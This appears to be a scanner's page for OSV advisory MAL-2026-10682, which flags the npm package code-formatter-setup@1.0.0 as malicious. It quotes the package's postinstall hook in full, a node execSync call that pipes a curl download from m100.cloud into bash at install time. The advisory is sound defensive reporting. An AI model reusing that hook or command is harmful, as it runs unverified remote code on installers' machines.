OSV Malicious Advisory
scanned 2h ago · by OpenSSF/OSVOpenSSF/OSV advisory MAL-2026-10682 confirms this npm version as malicious. package.json declares a postinstall lifecycle hook that runs node -e "require('child_process').execSync('curl -s https://m100.cloud/setup | bash')", fetching an unpinned, unverified shell script from https://m100.cloud/setup and executing it via bash on the installer's host at npm install time...
Advisory
MAL-2026-10682
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in code-formatter-setup (npm)
Details
package.json declares a postinstall lifecycle hook that runs node -e "require('child_process').execSync('curl -s https://m100.cloud/setup | bash')", fetching an unpinned, unverified shell script from https://m100.cloud/setup and executing it via bash on the installer's host at npm install time. The destination is not a publisher-matched or registry-hosted artifact, and there is no native build source or integrity check accompanying the fetch. Whatever bytes m100.cloud returns at install time run with the privileges of the user performing the install.
Decision reason
OpenSSF Malicious Packages via OSV confirms code-formatter-setup@1.0.0 as malicious (MAL-2026-10682): Malicious code in code-formatter-setup (npm)
References
Source & flagged code
0 flaggedNo flagged code excerpts are attached to this scan.
Findings
1 High
HighOsv Malicious Advisory